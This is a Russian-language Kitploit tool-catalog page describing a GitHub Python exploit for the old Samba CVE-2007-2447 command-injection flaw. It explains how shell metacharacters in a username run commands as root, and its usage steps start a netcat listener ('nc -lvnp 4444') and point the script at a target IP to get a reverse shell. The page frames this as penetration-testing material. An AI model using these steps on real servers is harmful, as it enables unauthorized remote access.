Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Эксплойт для Samba CVE-2007-2447 | Kitploit
Инструменты/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Эксплойт для Samba CVE-2007-2447

Репозиторий
24 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Samba CVE-2007-2447 (Username Map Script)

Этот репозиторий содержит Python-скрипт, предназначенный для автоматизации эксплуатации уязвимости CVE-2007-2447 в серверах Samba (версии 3.0.20 – 3.0.25rc3). Этот инструмент разработан исключительно в образовательных целях и для авторизованного тестирования на проникновение.

📝 Технико-академическое описание

Уязвимость «Username Map Script» возникает из-за отсутствия очистки (санитизации) ввода имён пользователей, когда в конфигурации Samba включена опция username map script. При отправке имени пользователя, содержащего метасимволы оболочки (например, обратные кавычки ` или под-оболочки $()), сервер выполняет эти команды с привилегиями службы (часто root).

🚀 Требования

  • Операционная система: Kali Linux / Parrot OS (или любой Linux с установленным smbclient).
  • Язык: Python 3.x.
  • Зависимости: smbclient (должен быть доступен в PATH системы).
  • 🛠️ Установка и использование

    1. Клонировать репозиторий:
      root@kitploit:~
      git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
      cd samba-exploit-cve-2007-2447
      
    2. Дать права на выполнение chmod +x exploit.py
    3. Подготовить Listener (Kali Linux) nc -lvnp 4444
    4. Запустить эксплойт ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
    Скачать инструмент